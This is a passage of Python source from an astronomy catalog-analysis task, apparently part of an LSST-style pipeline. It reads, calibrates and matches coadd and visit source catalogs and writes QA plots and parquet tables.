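              "fuchsia", "gold", "lightseagreen", "lime"]
flags = ["base_PixelFlags_flag_edge", "base_PsfFlux_flag", "deblend_skipped"]
highlightList = [("base_PsfFlux_flag", 0, "turquoise")]  # pre-seeded entry
for ih, flagName in enumerate(flags):
    # Tuple membership: skip any flag already named in an existing triple.
    if not any(flagName in highlight for highlight in highlightList):
        highlightList += [(flagName, 0, FLAGCOLORS[ih % len(FLAGCOLORS)])]
# Result: the edge flag gets "yellow" (ih=0), deblend_skipped gets
# "aquamarine" (ih=2); base_PsfFlux_flag is skipped as pre-seeded.
# ------------------------------------------------------------------------------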
plotKwargs.update(dict(highlightList=highlightList))\n\n if self.config.doPlotStarGalaxy:\n if \"ext_shapeHSM_HsmSourceMoments_xx\" in unforcedSchema:\n plotList.append(self.plotStarGal(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotStarGal: ext_shapeHSM_HsmSourceMoments_xx not \"\n \"in forcedSchema\")\n\n if self.config.doPlotSizes:\n if all(ss in unforcedSchema for ss in [\"base_SdssShape_psf_xx\", \"calib_psf_used\"]):\n plotList.append(self.plotSizes(unforced, plotInfoDict, areaDict,\n forcedStr=forcedStr.replace(\"forced\", \"unforced\"),\n postFix=\"_unforced\", **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx and/or calib_psf_used \"\n \"not in unforcedSchema\")\n if haveForced:\n if all(ss in forcedSchema for ss in [\"base_SdssShape_psf_xx\", \"calib_psf_used\"]):\n plotList.append(self.plotSizes(forced, plotInfoDict, areaDict,\n forcedStr=forcedStr, **plotKwargs))\n else:\n self.log.warning(\"Cannot run plotSizes: base_SdssShape_psf_xx and/or calib_psf_used \"\n \"not in forcedSchema\")\n if cosmos:\n plotList.append(self.plotCosmos(forced, plotInfoDict, areaDict, cosmos, repoInfo.dataId))\n\n # Haven't got reference catalog loading working for a gen3 repo...\n if (self.config.doPlotMatches or self.config.doWriteParquetTables) and not repoInfo.isGen3:\n matchAreaDict = {}\n # First write out unforced match parquet tables\n astromMatches, matchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_meas\",\n self.config.astromRefObjLoader, aliasDictList=aliasDictList, haveForced=False)\n unpackedMatches = None\n self.zpLabelPacked = self.zpLabel\n photomMatches, matchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_meas\",\n self.config.photomRefObjLoader, aliasDictList=aliasDictList, haveForced=False)\n qaTableSuffix = \"_unforced\"\n if self.config.doWriteParquetTables:\n for calibType, calibMatches in [(\"Astrom\", astromMatches), (\"Photom\", photomMatches)]:\n matchesDataRef = repoInfo.butler.dataRef(\n \"analysis\" + calibType + \"MatchFullRefCoaddTable\" + qaTableSuffix,\n dataId=repoInfo.dataId)\n writeParquet(matchesDataRef, calibMatches, badArray=None, prefix=\"src_\")\n # Now write out forced match parquet tables, if present\n if haveForced:\n astromMatches, astromMatchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_forced_src\",\n self.config.astromRefObjLoader, aliasDictList=aliasDictList, haveForced=haveForced)\n photomMatches, photomMatchAreaDict = self.readSrcMatches(\n repoInfo, patchRefExistsList, self.config.coaddName + \"Coadd_forced_src\",\n self.config.photomRefObjLoader, aliasDictList=aliasDictList, haveForced=haveForced)\n qaTableSuffix = \"_forced\"\n if self.config.doWriteParquetTables:\n for calibType, calibMatches in [(\"Astrom\", astromMatches), (\"Photom\", photomMatches)]:\n matchesDataRef = repoInfo.butler.dataRef(\n \"analysis\" + calibType + \"MatchFullRefCoaddTable\" + qaTableSuffix,\n dataId=repoInfo.dataId)\n writeParquet(matchesDataRef, calibMatches, badArray=None, prefix=\"src_\")\n\n if self.config.writeParquetOnly:\n self.log.info(\"Exiting after writing Parquet tables. 
No plots generated.\")\n return\n\n if self.config.doPlotMatches:\n plotKwargs.update(dict(zpLabel=self.zpLabel))\n matchHighlightList = [\n (\"src_\" + self.config.analysis.fluxColumn.replace(\"_instFlux\", \"_flag\"), 0,\n \"turquoise\"), (\"src_deblend_nChild\", 0, \"lime\")]\n for ih, flagName in enumerate(list(self.config.analysis.flags)):\n flagName = \"src_\" + flagName\n if not any(flagName in highlight for highlight in matchHighlightList):\n matchHighlightList += [(flagName, 0, FLAGCOLORS[ih%len(FLAGCOLORS)]), ]\n plotKwargs.update(dict(highlightList=matchHighlightList, matchRadius=self.matchRadius,\n matchRadiusUnitStr=self.matchRadiusUnitStr))\n matchLabel = \"matched to\\n\" + self.config.astromRefObjLoader.ref_dataset_name\n matchLabel = matchLabel + \"\\n (noApCorr)\" if self.config.doBackoutApCorr else matchLabel\n plotList.append(self.plotAstromMatches(\n astromMatches, plotInfoDict, astromMatchAreaDict, self.config.astromRefObjLoader,\n unpackedMatches=unpackedMatches, forcedStr=matchLabel, **plotKwargs))\n matchLabel = \"matched to\\n\" + self.config.photomRefObjLoader.ref_dataset_name\n matchLabel = matchLabel + \"\\n (noApCorr)\" if self.config.doBackoutApCorr else matchLabel\n plotList.append(self.plotPhotomMatches(\n photomMatches, plotInfoDict, photomMatchAreaDict, self.config.photomRefObjLoader,\n forcedStr=matchLabel, **plotKwargs))\n\n for cat in self.config.externalCatalogs:\n with andCatalog(cat):\n matches = self.matchCatalog(forced, repoInfo.filterName,\n self.config.externalCatalogs[cat])\n if matches is not None:\n matchLabel = \"matched to\\n\" + self.config.externalCatalogs[cat]\n plotList.append(self.plotMatches(matches, plotInfoDict, matchAreaDict,\n forcedStr=matchLabel, **plotKwargs))\n else:\n self.log.warning(\"Could not create match catalog for {:}. Is \"\n \"lsst.meas.extensions.astrometryNet setup?\".format(cat))\n\n if not repoInfo.isGen3:\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCoadd\", repoInfo.dataId,\n repoInfo.butler, subdir=subdir)\n else:\n self.allStats, self.allStatsHigh = savePlots(plotList, \"plotCoadd\", repoInfo.dataId,\n butlerGen2, subdir=subdir)\n\n metaDict = {kk: plotInfoDict[kk] for kk in (\"filter\", \"tract\", \"rerun\")\n if plotInfoDict[kk] is not None}\n if plotInfoDict[\"cameraName\"]:\n metaDict[\"camera\"] = plotInfoDict[\"cameraName\"]\n self.verifyJob = updateVerifyJob(self.verifyJob, metaDict=metaDict, specsList=None)\n # TODO: DM-26758 (or DM-14768) should make the following lines a proper\n # butler.put by directly persisting json files.\n if not repoInfo.isGen3:\n verifyJobFilename = repoInfo.butler.get(\"coaddAnalysis_verify_job_filename\",\n dataId=repoInfo.dataId)[0]\n else:\n verifyJobFilename = butlerGen2.get(\"coaddAnalysis_verify_job_filename\", dataId=repoInfo.dataId)[0]\n self.verifyJob.write(verifyJobFilename)\n\n def readParquetTables(self, dataRefList, dataset, repoInfo, dfDataset=None,\n doApplyExternalPhotoCalib=False, doApplyExternalSkyWcs=False, useMeasMosaic=False,\n iCat=None):\n \"\"\"Read in, calibrate, and concatenate parquet tables from a list of\n dataRefs.\n\n The calibration performed is based on config parameters. For coadds,\n the only option is the calibration zeropoint. For visits, the options\n include external calibrations for both photometry (e.g. fgcm) and wcs\n (e.g. 
jointcal) or simply the zero point from single frame processing.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of ``dataset``\n are to be read in. NOTE: if the filter under consideration does\n not exist in the coadd obj parquet table for any given patch,\n that patch will be removed in place from this list.\n dataset : `str`\n Name of the catalog ``dataset`` to be read in, e.g.\n \"deepCoadd_obj\" (for coadds) or \"source\" (for visits).\n repoInfo : `lsst.pipe.base.struct.Struct`\n A struct containing elements with repo information needed to\n determine if the catalog data is coadd or visit level and, if the\n latter, to create appropriate dataIds to look for the external\n calibration datasets.\n dfDataset : `str` or `None`, optional\n Name of the dataFrame \\\"dataset\\\" to be read in for multilevel\n parquet tables. For coadd catalogs, which are of type\n `lsst.pipe.tasks.parquetTable.MultilevelParquetTable`, this is\n actually not optional but must be one of, \"forced_src\", \"meas\", or\n \"ref\". This parameter is not relevant for visit-level catalogs,\n which are of type `lsst.pipe.tasks.parquetTable.ParquetTable`.\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measuerment to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` the catalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). 
For testing\n implementations.\n iCat : `int` or `None,` optional\n Integer representing whether this is comparison catalog 0 or 1.\n\n Raises\n ------\n TaskError\n If no data is read in for the ``dataRefList``.\n RuntimeError\n If catalog is of type\n `lsst.pipe.tasks.parquetTable.MultilevelParquetTable` but no\n ``dfDataset`` is provided.\n\n Returns\n -------\n allCats : `pandas.core.frame.DataFrame`\n The concatenated catalogs as a pandas DataFrame.\n \"\"\"\n # It is much faster to concatenate a list of DataFrames than to\n # concatenate successively within the for loop.\n commonZpCatList = []\n catList = []\n colsToLoadList = None\n dfLoadColumns = None\n refColsToLoadList = None\n measColsToLoadList = None\n dataRefToRemoveList = []\n parquetCat = None\n isMulti = False\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(dataset):\n self.log.info(\"Dataset does not exist: {}, {}\".format(dataId, dataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(dataset, dataId=dataId)\n except LookupError:\n continue\n\n if not repoInfo.isGen3:\n parquetCat = dataRef.get(dataset, immediate=True)\n else:\n butler = dataRef[\"butler\"]\n parquetCat = butler.get(dataset, dataId=dataId, immediate=True)\n isMulti = (isinstance(parquetCat, MultilevelParquetTable)\n or isinstance(parquetCat.columns, pd.MultiIndex))\n if isMulti and not any(dfDataset == dfName for dfName in [\"forced_src\", \"meas\", \"ref\"]):\n raise RuntimeError(\"Must specify a dfDataset for multilevel parquet tables\")\n bandName = repoInfo.genericBandName\n filterLevelStr = \"band\"\n physicalFilterStr = \"physical_filter\" if repoInfo.isGen3 else \"filter\"\n\n if isMulti:\n if isinstance(parquetCat.columns, pd.MultiIndex):\n existsBandList = parquetCat.columns.levels[1]\n elif isinstance(parquetCat, MultilevelParquetTable):\n existsBandList = parquetCat.columnLevelNames[\"band\"]\n else:\n existsBandList = None\n\n if isMulti and existsBandList is not None:\n # Some obj tables do not contain data for all filters\n if bandName not in existsBandList:\n self.log.info(\"Filter {} does not exist for: {}, {}. 
Skipping patch...\".\n format(dataId[physicalFilterStr], dataId, dataset))\n dataRefToRemoveList.append(dataRef)\n continue\n\n if dfLoadColumns is None and isMulti:\n dfLoadColumns = {\"dataset\": dfDataset, filterLevelStr: bandName}\n\n # On the first dataRef read in, create list of columns to load\n # based on config lists and their existence in the catalog table.\n if colsToLoadList is None:\n catColumns = getParquetColumnsList(parquetCat, dfDataset=dfDataset, filterName=bandName)\n colsToLoadList = [col for col in catColumns if\n (col.startswith(tuple(self.config.baseColStrList))\n and not any(s in col for s in self.config.notInColStrList))]\n if dfLoadColumns is None:\n dfLoadColumns = colsToLoadList\n else:\n dfLoadColumns.update(column=colsToLoadList)\n if isMulti:\n if hasattr(parquetCat, \"toDataFrame\"):\n cat = parquetCat.toDataFrame(columns=dfLoadColumns)\n else:\n parametersDict = {\"columns\": dfLoadColumns}\n cat = butler.get(dataset, dataId=dataId, parameters=parametersDict)\n cat = cat[dfDataset][bandName].copy()\n else:\n if hasattr(parquetCat, \"toDataFrame\"):\n cat = parquetCat.toDataFrame(columns=dfLoadColumns)\n else:\n cat = parquetCat[dfLoadColumns].copy()\n cat = addElementIdColumn(cat, dataId, repoInfo=repoInfo)\n if dfDataset == \"forced_src\": # insert some columns from the ref and meas cats for forced cats\n if refColsToLoadList is None:\n refColumns = getParquetColumnsList(parquetCat, dfDataset=\"ref\", filterName=bandName)\n refColsToLoadList = [col for col in refColumns if\n (col.startswith(tuple(self.config.columnsToCopyFromRef))\n and not any(s in col for s in self.config.notInColStrList)\n and not any(s in col for s in colsToLoadList))]\n refLoadDict = {\"dataset\": \"ref\", filterLevelStr: bandName, \"column\": refColsToLoadList}\n if hasattr(parquetCat, \"toDataFrame\"):\n ref = parquetCat.toDataFrame(columns=refLoadDict)\n else:\n parametersDict = {\"columns\": refLoadDict}\n ref = butler.get(dataset, dataId=dataRef[\"dataId\"], parameters=parametersDict)\n ref = ref[\"ref\"][bandName]\n cat = pd.concat([cat, ref], axis=1)\n if measColsToLoadList is None:\n measColumns = getParquetColumnsList(parquetCat, dfDataset=\"meas\", filterName=bandName)\n measColsToLoadList = [col for col in measColumns if\n (col.startswith(tuple(self.config.columnsToCopyFromMeas))\n and not any(s in col for s in self.config.notInColStrList)\n and not any(s in col for s in colsToLoadList)\n and not any(s in col for s in refColsToLoadList))]\n measLoadDict = {\"dataset\": \"meas\", filterLevelStr: bandName, \"column\": measColsToLoadList}\n if hasattr(parquetCat, \"toDataFrame\"):\n meas = parquetCat.toDataFrame(columns=measLoadDict)\n else:\n parametersDict = {\"columns\": measLoadDict}\n meas = butler.get(dataset, dataId=dataRef[\"dataId\"], parameters=parametersDict)\n meas = meas[\"meas\"][bandName]\n\n cat = pd.concat([cat, meas], axis=1)\n\n if \"patch\" in dataId: # This is a coadd catalog\n cat = self.calibrateCatalogs(cat, wcs=repoInfo.wcs)\n catList.append(cat)\n else: # This is a visit catalog\n # Scale fluxes to common zeropoint to make basic comparison\n # plots without calibrated ZP influence.\n commonZpCat = cat.copy(True)\n commonZpCat = calibrateSourceCatalog(commonZpCat, self.config.analysis.commonZp)\n if doApplyExternalPhotoCalib:\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(repoInfo.photoCalibDataset):\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n else:\n try:\n 
dataRef[\"butler\"].getURI(repoInfo.photoCalibDataset, dataId=dataRef[\"dataId\"])\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n if doApplyExternalSkyWcs:\n if not repoInfo.isGen3:\n if not dataRef.datasetExists(repoInfo.skyWcsDataset):\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.skyWcsDataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0:r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n fluxMag0 = None\n if not doApplyExternalPhotoCalib:\n photoCalib = repoInfo.butler.get(\"calexp\" + repoInfo.delimiterStr + \"photoCalib\", dataId)\n fluxMag0 = photoCalib.getInstFluxAtZeroMagnitude()\n cat = self.calibrateCatalogs(dataRef, cat, fluxMag0, repoInfo, doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs, useMeasMosaic, iCat=iCat)\n catList.append(cat)\n commonZpCatList.append(commonZpCat)\n\n # Remove any non-existent patches from dataRefList\n for dataRef in dataRefToRemoveList:\n dataRefList.remove(dataRef)\n\n if not catList:\n raise TaskError(\"No catalogs read: %s\" % ([dataId for dataRef in dataRefList]))\n allCats = pd.concat(catList, axis=0)\n # The object \"id\" is associated with the dataframe index. Add a\n # column that is the id so that it is available for operations on it,\n # e.g. cat[\"id\"].\n allCats[\"id\"] = allCats.index\n # Optionally backout aperture corrections\n if self.config.doBackoutApCorr:\n allCats = backoutApCorr(allCats)\n if commonZpCatList:\n allCommonZpCats = pd.concat(commonZpCatList, axis=0)\n allCommonZpCats[\"id\"] = allCommonZpCats.index\n if self.config.doBackoutApCorr:\n allCommonZpCats = backoutApCorr(allCommonZpCats)\n else:\n allCommonZpCats = None\n return allCats, allCommonZpCats\n\n def readAfwCoaddTables(self, dataRefList, repoInfo, haveForced, aliasDictList=None):\n \"\"\"Read in, concatenate, calibrate, and convert to DataFrame a list of\n coadd catalogs that were persisted as afwTables.\n\n This function delegates to readCatalogs for the actual catalog reading\n and concatenating, in which an extra column indicating the patch ID is\n added to each catalog before appending them all to a single list. This\n is useful for any subsequent QA analysis using the persisted parquet\n files. Here these catalogs are calibrated, have useful columns copied\n from the *Coadd_ref to *Coadd_forced_src catalogs, and are converted\n to pandas DataFrames.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A `list` of butler data references whose coadd catalogs are to be\n read in.\n repoInfo : `lsst.pipe.base.Struct`\n A struct containing relevant information about the repository under\n study. 
Elements used here include the dataset names for any\n external calibrations to be applied.\n haveForced : `bool`\n A boolean indicating if a forced_src catalog exists in the\n repository associated with ``repoInfo``.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n\n Raises\n ------\n RuntimeError\n If lengths of *Coadd_forced_src and *Coadd_ref catalogs are not\n equal.\n\n Returns\n -------\n result : `lsst.pipe.base.Struct`\n A struct with attributes:\n ``unforced``\n The concatenated unforced, or \"_meas\", calibrated catalog\n (`pandas.core.frame.DataFrame`).\n ``forced``\n The concatenated forced, or \"_forced_src\", calibrated catalog\n (`pandas.core.frame.DataFrame`).\n ``areaDict``\n Contains patch keys that index the patch corners in RA/Dec and\n the effective patch area (i.e. neither the \"BAD\" nor \"NO_DATA\"\n mask bit is set) (`dict`).\n \"\"\"\n if haveForced:\n forcedCatStruct = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_forced_src\",\n repoInfo, aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs)\n forced = forcedCatStruct.catalog\n areaDict = forcedCatStruct.areaDict\n forced = self.calibrateCatalogs(forced, wcs=repoInfo.wcs)\n forcedSchema = getSchema(forced)\n else:\n forced = None\n unforcedCatStruct = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_meas\", repoInfo,\n aliasDictList=aliasDictList,\n readFootprintsAs=self.config.readFootprintsAs)\n unforced = unforcedCatStruct.catalog\n unforced = self.calibrateCatalogs(unforced, wcs=repoInfo.wcs)\n unforcedSchema = getSchema(unforced)\n if not haveForced:\n areaDict = unforcedCatStruct.areaDict\n if haveForced:\n # Copy over some fields from _ref and _meas catalogs to\n # _forced_src catalog.\n refCat = self.readCatalogs(dataRefList, self.config.coaddName + \"Coadd_ref\", repoInfo).catalog\n if len(forced) != len(refCat):\n raise RuntimeError((\"Lengths of forced (N = {:d}) and ref (N = {:d}) cats \"\n \"don't match\").format(len(forced), len(refCat)))\n refCatSchema = getSchema(refCat)\n refColList = []\n for strPrefix in self.config.columnsToCopyFromRef:\n refColList.extend(refCatSchema.extract(strPrefix + \"*\"))\n refColsToCopy = [col for col in refColList if col not in forcedSchema\n and not any(s in col for s in self.config.notInColStrList)\n and col in refCatSchema\n and not (repoInfo.hscRun and col == \"slot_Centroid_flag\")]\n forced = addColumnsToSchema(refCat, forced, refColsToCopy)\n measColList = []\n for strPrefix in self.config.columnsToCopyFromMeas:\n measColList.extend(refCatSchema.extract(strPrefix + \"*\"))\n measColsToCopy = [col for col in measColList if col not in forcedSchema\n and not any(s in col for s in self.config.notInColStrList)\n and col in unforcedSchema\n and not (repoInfo.hscRun and col == \"slot_Centroid_flag\")]\n forced = addColumnsToSchema(unforced, forced, measColsToCopy)\n\n # Convert to pandas DataFrames\n unforced = unforced.asAstropy().to_pandas().set_index(\"id\", drop=False)\n if haveForced:\n forced = forced.asAstropy().to_pandas().set_index(\"id\", drop=False)\n return Struct(unforced=unforced, forced=forced, areaDict=areaDict)\n\n def readCatalogs(self, dataRefList, dataset, repoInfo, aliasDictList=None, fakeCat=None,\n raFakesCol=\"raJ2000\", decFakesCol=\"decJ2000\", readFootprintsAs=None,\n doApplyExternalPhotoCalib=False, doApplyExternalSkyWcs=False, useMeasMosaic=False,\n iCat=None):\n \"\"\"Read in and concatenate 
catalogs of type dataset in lists of\n data references.\n\n An extra column indicating the patch ID is added to each catalog before\n appending them all to a single list. This is useful for any subsequent\n QA analysis using the persisted parquet files.\n\n Parameters\n ----------\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of dataset type are\n to be read in.\n dataset : `str`\n Name of the catalog dataset to be read in.\n repoInfo : `lsst.pipe.base.Struct`\n A struct containing relevant information about the repository under\n study. Elements used here include the dataset names for any\n external calibrations to be applied.\n aliasDictList : `dict` or `None`, optional\n A `dict` of alias columns to add for backwards compatibility with\n old repositories.\n fakeCat : `pandas.core.frame.DataFrame` or `None`, optional\n Catalog of fake sources, used if hasFakes is `True` in which case a\n column (onPatch) is added with the patch number if the fake source\n overlaps a ccd and `np.nan` if it does not.\n raFakesCol : `str`, optional\n The name of the RA column to use from the fakes catalogue.\n decFakesCol : `str`, optional\n The name of the Dec column to use from the fakes catalogue.\n readFootprintsAs : `None` or `str`, optional\n A string dictating if and what type of Footprint to read in along\n with the catalog:\n `None` : do not read in Footprints.\n \"light\": read in regular Footprints (include SpanSet and list of\n peaks per Footprint).\n \"heavy\": read in HeavyFootprints (include regular Footprint plus\n flux values per Footprint).\n doApplyExternalPhotoCalib : `bool`, optional\n If `True`: Apply the external photometric calibrations specified by\n ``repoInfo.photoCalibDataset`` to the catalog.\n If `False`: Apply the ``fluxMag0`` photometric calibration from\n Single Frame Measuerment to the catalog.\n doApplyExternalSkyWcs : `bool`, optional\n If `True`: Apply the external astrometric calibrations specified by\n ``repoInfo.skyWcsDataset`` the calalog.\n If `False`: Retain the WCS from Single Frame Measurement.\n useMeasMosaic : `bool`, optional\n Use meas_mosaic's applyMosaicResultsCatalog for the external\n calibration (even if photoCalib object exists). For testing\n implementations.\n iCat : `int` or `None,` optional\n Integer representing whether this is comparison catalog 0 or 1.\n\n Raises\n ------\n TaskError\n If no data is read in for the dataRefList.\n RuntimeError\n If entry for ``readFootprintsAs`` is not recognized (i.e. not one\n of `None`, \\\"light\\\", or \\\"heavy\\\").\n\n Returns\n -------\n result : `lsst.pipe.base.Struct`\n A struct with attributes:\n ``commonZpCatalog``\n The concatenated common zeropoint calibrated catalog\n (`lsst.afw.table.SourceCatalog` or `None` for coadd data).\n ``catalog``\n The concatenated SFM or external calibration calibrated catalog\n (`lsst.afw.table.SourceCatalog`).\n ``areaDict``\n Contains patch keys that index the patch corners in RA/Dec and\n the effective patch area (i.e. 
neither the \"BAD\" nor \"NO_DATA\"\n mask bit is set) (`dict`).\n ``fakeCat``\n The updated catalog of fake sources, or `None` if the config\n parameter hasFakes is `False` (`pandas.core.frame.DataFrame`).\n \"\"\"\n commonZpCatList = []\n catList = []\n dataRefExistsList = []\n if not repoInfo.isGen3:\n for dataRef in dataRefList:\n if dataRef.datasetExists(dataset):\n dataRefExistsList.append(dataRef)\n else:\n for dataRef in dataRefList:\n dataId = dataRef[\"dataId\"]\n try:\n repoInfo.butler.getURI(dataset, dataId=dataId)\n dataRefExistsList.append(dataRef)\n except LookupError:\n self.log.info(\"No URI for %s\", dataId)\n calexpPrefix = dataset[:dataset.find(\"_\")] if \"_\" in dataset else \"\"\n try:\n areaDict, fakeCat = computeAreaDict(repoInfo, dataRefExistsList, dataset=calexpPrefix,\n fakeCat=fakeCat, raFakesCol=raFakesCol,\n decFakesCol=decFakesCol)\n except (RuntimeError, AttributeError):\n areaDict, fakeCat = None, None\n for dataRef in dataRefExistsList:\n if not readFootprintsAs:\n catFlags = afwTable.SOURCE_IO_NO_FOOTPRINTS\n elif readFootprintsAs == \"light\":\n catFlags = afwTable.SOURCE_IO_NO_HEAVY_FOOTPRINTS\n elif readFootprintsAs == \"heavy\":\n catFlags = 0\n else:\n raise RuntimeError(\"Unknown entry for readFootprintsAs: {:}. Only recognize one of: \"\n \"None, \\\"light\\\", or \\\"heavy\\\"\".format(readFootprintsAs))\n dataId = dataRef[\"dataId\"] if repoInfo.isGen3 else dataRef.dataId\n if not repoInfo.isGen3:\n cat = dataRef.get(dataset, immediate=True, flags=catFlags)\n else:\n butler = dataRef[\"butler\"]\n cat = butler.get(dataset, dataId=dataId, immediate=True, flags=catFlags)\n # Optionally backout aperture corrections\n if self.config.doBackoutApCorr:\n cat = backoutApCorr(cat)\n schema = getSchema(cat)\n # Old catalogs did not have base_FootprintArea_value so, for\n # backwards compatibility, check if present and add if not.\n if (self.config.doPlotFootprintArea and \"base_FootprintArea_value\" not in schema\n and len(schema.extract(\"merge_footprint*\")) > 0): # to not bother for forced cats\n if self.config.readFootprintsAs != \"heavy\":\n self.log.warning(\"config.doPlotFootprintArea is True, but do not have \"\n \"base_FootprintArea_value in schema. If reading in an older afw \"\n \"src catalog, may need to run with config.readFootprintsAs=\\\"heavy\\\" \"\n \"to be able to read in the footprints and compute their area.\")\n else:\n cat = addFootprintArea(cat)\n # Set some \"aliases\" for differing schema naming conventions.\n # Note: we lose the alias maps when converting to pandas, so now\n # must actually make a copy of the \"old\" column to a new one with\n # the \"new\" name. 
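This is really just a backwards-compatibility\n # accommodation for catalogs that are already pretty old, so it\n # will be a no-op in most cases and will likely disappear in the\n # not-too-distant future.\n # (Illustrative sketch only: the helper below presumably amounts to\n # cat[newName] = cat[oldName] for each entry in aliasDictList.)\n 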
if aliasDictList:\n cat = addAliasColumns(cat, aliasDictList)\n # Add elementId column, where element is \"patch\" for coadd data and\n # \"ccd/detector\" for visit data (useful to have in Parquet tables\n # for subsequent interactive analysis).\n if \"patch\" in repoInfo.dataId: # This is a coadd catalog\n cat = addIntFloatOrStrColumn(cat, dataId[\"patch\"], \"patchId\",\n \"Patch on which source was detected\")\n else: # This is a visit catalog\n cat = addIntFloatOrStrColumn(cat, dataId[repoInfo.ccdKey], \"ccdId\",\n \"Id of CCD on which source was detected\")\n # Compute Focal Plane coordinates for each source if not\n # already there.\n if (self.config.doPlotCentroids or self.config.analysis.doPlotFP\n or self.config.analysisAstromMatches.doPlotFP\n or self.config.analysisPhotomMatches.doPlotFP):\n if \"base_FPPosition_x\" not in schema and \"focalplane_x\" not in schema:\n det = repoInfo.butler.get(\"calexp_detector\", dataId)\n cat = addFpPoint(det, cat)\n\n # Scale fluxes to common zeropoint to make basic comparison\n # plots without calibrated ZP influence.\n commonZpCat = cat.copy(True)\n commonZpCat = calibrateSourceCatalog(commonZpCat, self.config.analysis.commonZp)\n commonZpCatList.append(commonZpCat)\n if doApplyExternalPhotoCalib:\n if repoInfo.hscRun:\n if not dataRef.datasetExists(\"fcr_hsc_md\") or not dataRef.datasetExists(\"wcs_hsc\"):\n continue\n else:\n if not repoInfo.isGen3:\n # Check for both jointcal_wcs and wcs for\n # compatibility with old datasets.\n if not (dataRef.datasetExists(repoInfo.photoCalibDataset)\n or dataRef.datasetExists(\"fcr_md\")):\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.photoCalibDataset, dataId=dataRef[\"dataId\"])\n except LookupError:\n self.log.info(\"Dataset does not exist: {0!r}, {1:s}\".\n format(dataId, repoInfo.photoCalibDataset))\n continue\n if doApplyExternalSkyWcs:\n if repoInfo.hscRun:\n if not dataRef.datasetExists(\"fcr_hsc_md\") or not dataRef.datasetExists(\"wcs_hsc\"):\n continue\n else:\n if not repoInfo.isGen3:\n # Check for both jointcal_wcs and wcs for\n # compatibility with old datasets.\n if not (dataRef.datasetExists(repoInfo.skyWcsDataset)\n or dataRef.datasetExists(\"wcs\")):\n continue\n else:\n try:\n dataRef[\"butler\"].getURI(repoInfo.skyWcsDataset, dataId=dataId)\n except LookupError:\n self.log.info(\"Dataset does not exist: {0!r}, {1:s}\".\n format(dataId, repoInfo.skyWcsDataset))\n continue\n\n fluxMag0 = None\n if not doApplyExternalPhotoCalib:\n photoCalib = repoInfo.butler.get(\"calexp\" + repoInfo.delimiterStr + \"photoCalib\", dataId)\n fluxMag0 = photoCalib.getInstFluxAtZeroMagnitude()\n cat = self.calibrateCatalogs(dataRef, cat, fluxMag0, repoInfo, doApplyExternalPhotoCalib,\n doApplyExternalSkyWcs, useMeasMosaic, iCat=iCat)\n catList.append(cat)\n if not catList:\n raise TaskError(\"No catalogs read: %s\" % ([dataRef[\"dataId\"] if repoInfo.isGen3\n else dataRef.dataId for dataRef in dataRefList]))\n\n return Struct(commonZpCatalog=concatenateCatalogs(commonZpCatList),\n catalog=concatenateCatalogs(catList), areaDict=areaDict, fakeCat=fakeCat)\n\n def readSrcMatches(self, repoInfo, dataRefList, dataset, refObjLoader, aliasDictList=None,\n goodFlagList=[], haveForced=False, doApplyExternalPhotoCalib=False,\n doApplyExternalSkyWcs=False, useMeasMosaic=False, readPackedMatchesOnly=False):\n \"\"\"Read in full records from the 
reference catalog used in calibration\n and match them to the source catalog.\n\n Calls loadReferencesAndMatchToCatalog() to load in the full reference\n records within the search radius used in SFM and performs a generic\n (RA/Dec) match to the source catalog, regardless of whether the objects\n were used in any calibration step. Culling of the source catalog based\n on flags (set in config.analysis.flags) can be performed prior to\n matching. Exceptions can be made with flags in goodFlagList, i.e.\n sources that have any of the flags in this list set will be retained\n for further (sub)selection and analysis, regardless of other flags\n being set.\n\n Parameters\n ----------\n repoInfo : `lsst.pipe.base.struct.Struct`\n A struct containing elements with repo information needed to\n determine if the catalog data is coadd or visit level and, if the\n latter, to create appropriate dataIds to look for the external\n calibration datasets.\n dataRefList : `list` of\n `lsst.daf.persistence.butlerSubset.ButlerDataRef`\n A list of butler data references whose catalogs of ``dataset``\n are 